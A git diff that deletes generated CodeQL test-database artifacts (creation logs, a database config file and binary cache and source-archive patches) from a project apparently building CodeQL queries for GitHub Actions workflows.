-[2024-02-03 10:17:54] Plumbing command codeql resolve languages completed: - { - "aliases" : { - "c" : "cpp", - "c++" : "cpp", - "c-c++" : "cpp", - "c-cpp" : "cpp", - "c#" : "csharp", - "java-kotlin" : "java", - "kotlin" : "java", - "javascript-typescript" : "javascript", - "typescript" : "javascript" - }, - "extractors" : { - "go" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" - } - ], - "python" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", - "extractor_options" : { - "logging" : { - "title" : "Options pertaining to logging.", - "description" : "Options pertaining to logging.", - "type" : "object", - "properties" : { - "verbosity" : { - "title" : "Python extractor logging verbosity level.", - "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", - "type" : "string", - "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" - } - } - } - } - } - ], - "java" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", - "extractor_options" : { - "exclude" : { - "title" : "A glob excluding files from analysis.", - "description" : "A glob indicating what files to exclude from the analysis.\n", - "type" : "string" - }, - "add_prefer_source" : { - "title" : "Whether to always prefer source files over class files.", - "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). 
The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction (experimental).", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "html" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" - } - ], - "xml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" - } - ], - "properties" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" - } - ], - "cpp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", - "extractor_options" : { } - } - ], - "swift" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" - } - ], - "csv" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" - } - ], - "yaml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" - } - ], - "csharp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files 
written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip|brotli)$" - } - } - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction.", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "cil" : { - "title" : "Whether to enable CIL extraction.", - "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "javascript" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", - "extractor_options" : { - "skip_types" : { - "title" : "Skip type extraction for TypeScript", - "description" : "Whether to skip the extraction of types in a TypeScript application", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "ruby" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip)$" - } - } - } - } - } - ] - } - } -[2024-02-03 10:17:54] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test -[2024-02-03 10:17:54] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. -[2024-02-03 10:17:54] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . -[2024-02-03 10:17:54] [PROGRESS] database init> Calculated baseline information for languages: (53ms). -[2024-02-03 10:17:54] [PROGRESS] database init> Resolving extractor yaml. -[2024-02-03 10:17:54] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:54] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:54] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. This in-progress database is ready to be populated by an extractor. -[2024-02-03 10:17:54] Plumbing command codeql database init completed. 
-[2024-02-03 10:17:54] [PROGRESS] database create> Running build command: []
-[2024-02-03 10:17:54] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db
-[2024-02-03 10:17:54] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh.
-[2024-02-03 10:17:54] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh]
-[2024-02-03 10:17:55] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test...
-[2024-02-03 10:17:55] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test...
-[2024-02-03 10:17:55] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list]
-[2024-02-03 10:17:55] Plumbing command codeql database trace-command completed.
-[2024-02-03 10:17:55] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db.
-[2024-02-03 10:17:55] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db
-[2024-02-03 10:17:55] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db...
-[2024-02-03 10:17:55] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml
-[2024-02-03 10:17:55] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache/version does not exist
-[2024-02-03 10:17:55] Tuple pool not found. Clearing relations with cached strings
-[2024-02-03 10:17:55] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode clear.
-[2024-02-03 10:17:55] Sequence stamp origin is -6222583512417648685
-[2024-02-03 10:17:55] Pausing evaluation to hard-clear memory at sequence stamp o+0
-[2024-02-03 10:17:55] Unpausing evaluation
-[2024-02-03 10:17:55] Pausing evaluation to quickly trim disk at sequence stamp o+1
-[2024-02-03 10:17:55] Unpausing evaluation
-[2024-02-03 10:17:55] Pausing evaluation to zealously trim disk at sequence stamp o+2
-[2024-02-03 10:17:55] Unpausing evaluation
-[2024-02-03 10:17:55] Trimming completed (7ms): Purged everything.
-[2024-02-03 10:17:55] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml
-[2024-02-03 10:17:55] Found 2 TRAP files (2.87 KiB)
-[2024-02-03 10:17:55] [PROGRESS] dataset import> Importing TRAP files
-[2024-02-03 10:17:55] Importing test.yml.trap.gz (1 of 2)
-[2024-02-03 10:17:55] Importing sourceLocationPrefix.trap.gz (2 of 2)
-[2024-02-03 10:17:55] [PROGRESS] dataset import> Merging relations
-[2024-02-03 10:17:55] Merging 1 fragment for 'files'.
-[2024-02-03 10:17:55] Merged 8 bytes for 'files'.
-[2024-02-03 10:17:55] Merging 1 fragment for 'folders'.
-[2024-02-03 10:17:55] Merged 80 bytes for 'folders'.
-[2024-02-03 10:17:55] Merging 1 fragment for 'containerparent'.
-[2024-02-03 10:17:55] Merged 80 bytes for 'containerparent'.
-[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_scalars'.
-[2024-02-03 10:17:55] Merged 552 bytes for 'yaml_scalars'.
-[2024-02-03 10:17:55] Merging 1 fragment for 'yaml'.
-[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'yaml'.
-[2024-02-03 10:17:55] Merging 1 fragment for 'locations_default'.
-[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'locations_default'.
-[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_locations'.
-[2024-02-03 10:17:55] Merged 472 bytes for 'yaml_locations'.
-[2024-02-03 10:17:55] Merging 1 fragment for 'sourceLocationPrefix'.
-[2024-02-03 10:17:55] Merged 4 bytes for 'sourceLocationPrefix'.
-[2024-02-03 10:17:55] Saving string and id pools to disk.
-[2024-02-03 10:17:55] Finished importing TRAP files.
-[2024-02-03 10:17:55] Read 13.45 KiB of uncompressed TRAP data.
-[2024-02-03 10:17:55] Relation data size: 3.93 KiB (merge rate: 52.86 KiB/s)
-[2024-02-03 10:17:55] String pool size: 2.05 MiB
-[2024-02-03 10:17:55] ID pool size: 1.03 MiB
-[2024-02-03 10:17:55] [PROGRESS] dataset import> Finished writing database (relations: 3.93 KiB; string pool: 2.05 MiB).
-[2024-02-03 10:17:55] Pausing evaluation to close the cache at sequence stamp o+3
-[2024-02-03 10:17:55] The disk cache is freshly trimmed; leave it be.
-[2024-02-03 10:17:55] Unpausing evaluation
-[2024-02-03 10:17:55] Plumbing command codeql dataset import completed.
-[2024-02-03 10:17:55] [PROGRESS] database finalize> TRAP import complete (447ms).
-[2024-02-03 10:17:55] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db
-[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import...
-[2024-02-03 10:17:56] [PROGRESS] database cleanup> TRAP files cleaned up (4ms).
-[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up scratch directory...
-[2024-02-03 10:17:56] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms).
-[2024-02-03 10:17:56] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml
-[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml.
-[2024-02-03 10:17:56] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode trim.
-[2024-02-03 10:17:56] Sequence stamp origin is -6222583510647662597
-[2024-02-03 10:17:56] Pausing evaluation to zealously trim disk at sequence stamp o+0
-[2024-02-03 10:17:56] Unpausing evaluation
-[2024-02-03 10:17:56] Trimming completed (3ms): Trimmed disposable data from cache.
-[2024-02-03 10:17:56] Pausing evaluation to close the cache at sequence stamp o+1
-[2024-02-03 10:17:56] The disk cache is freshly trimmed; leave it be.
-[2024-02-03 10:17:56] Unpausing evaluation
-[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Trimmed disposable data from cache.
-[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml
-[2024-02-03 10:17:56] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml (5ms).
-[2024-02-03 10:17:56] Plumbing command codeql dataset cleanup completed.
-[2024-02-03 10:17:56] Plumbing command codeql database cleanup completed with status 0.
-[2024-02-03 10:17:56] [PROGRESS] database finalize> Finished zipping source archive (578.00 B).
-[2024-02-03 10:17:56] Plumbing command codeql database finalize completed.
-[2024-02-03 10:17:56] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db.
-[2024-02-03 10:17:56] Terminating normally.
diff --git a/ql/lib/test-db/log/database-index-files-20240203.101755.239.log b/ql/lib/test-db/log/database-index-files-20240203.101755.239.log
deleted file mode 100644
index 858ec59a13da..000000000000
--- a/ql/lib/test-db/log/database-index-files-20240203.101755.239.log
+++ /dev/null
@@ -1,15 +0,0 @@ -[2024-02-03 10:17:55] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:55] Log file was started late. -[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:55] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --format=json -[2024-02-03 10:17:55] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] Plumbing command codeql resolve files completed: - [ - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test/test.yml" - ] -[2024-02-03 10:17:55] [DETAILS] database index-files> Found 1 files. -[2024-02-03 10:17:55] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:55] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] -[2024-02-03 10:17:55] Terminating normally. 
diff --git a/ql/lib/test-db/src.zip b/ql/lib/test-db/src.zip deleted file mode 100644 index 3dbf073c49924685cbbad30b59944af574c77ae9..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 578 zcmWIWW@Zs#;Nak3unBUGU_b)iKz3+xYEiL%L3v(DYH>+wk$!P%a!z8BenC-wR%&ud zv3_E5NoIatv3_!XN@`(_E{t24qo0$Rqz}>rCiE(Eb6SH=7admM+4Ebw}@-&*HCX*mO-(<>9jurcV|DmT#ZViIkhd$??4S(D4@jEe#GH zLQ}rY-Mre`mRS<8;aoAyhp>O}l|q-Aya^WjAv z%^yDeS19qFwD3&e-ivQz|0Q-uY`&Q}r|!?E8*|RR+su$Qv0+zf@ZJtR^@49DGYywj zum^ava}-DO?zLiMVA#RLz!2cg$Rxsmh%{t5P^6&(Dn?;|H!B;+a7G}k1k#&<4q{*c E0HyckLI3~& diff --git a/ql/src/test-db/baseline-info.json b/ql/src/test-db/baseline-info.json deleted file mode 100644 index 9e26dfeeb6e6..000000000000 --- a/ql/src/test-db/baseline-info.json +++ /dev/null @@ -1 +0,0 @@ -{} \ No newline at end of file diff --git a/ql/src/test-db/codeql-database.yml b/ql/src/test-db/codeql-database.yml deleted file mode 100644 index 1dedebb70bed..000000000000 --- a/ql/src/test-db/codeql-database.yml +++ /dev/null @@ -1,10 +0,0 @@ ---- -sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test -baselineLinesOfCode: 0 -unicodeNewlines: false -columnKind: utf16 -primaryLanguage: yaml -creationMetadata: - cliVersion: 2.16.1 - creationTime: 2024-02-03T09:17:52.592220Z -finalised: true diff --git a/ql/src/test-db/db-yaml/default/cache/.lock b/ql/src/test-db/db-yaml/default/cache/.lock deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info deleted file mode 100644 index 0111728636533e2c31d7b0489e64f46bcd4d6cf2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q 
diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info deleted file mode 100644 index 9c1ea6cdeb296b714876d0e928d9978e9ec788c9..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 41 ZcmZQz00U+S1tA%s91sm=%ij{e1^@)e0qp<) diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info deleted file mode 100644 index 9cdb710dfd9490f67f5103cbab69eb12829f96b4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 
diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 
diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 deleted file mode 100644 index 7bccaeb20c898fd660036bab54ae98c20280d0a3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ 
zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 
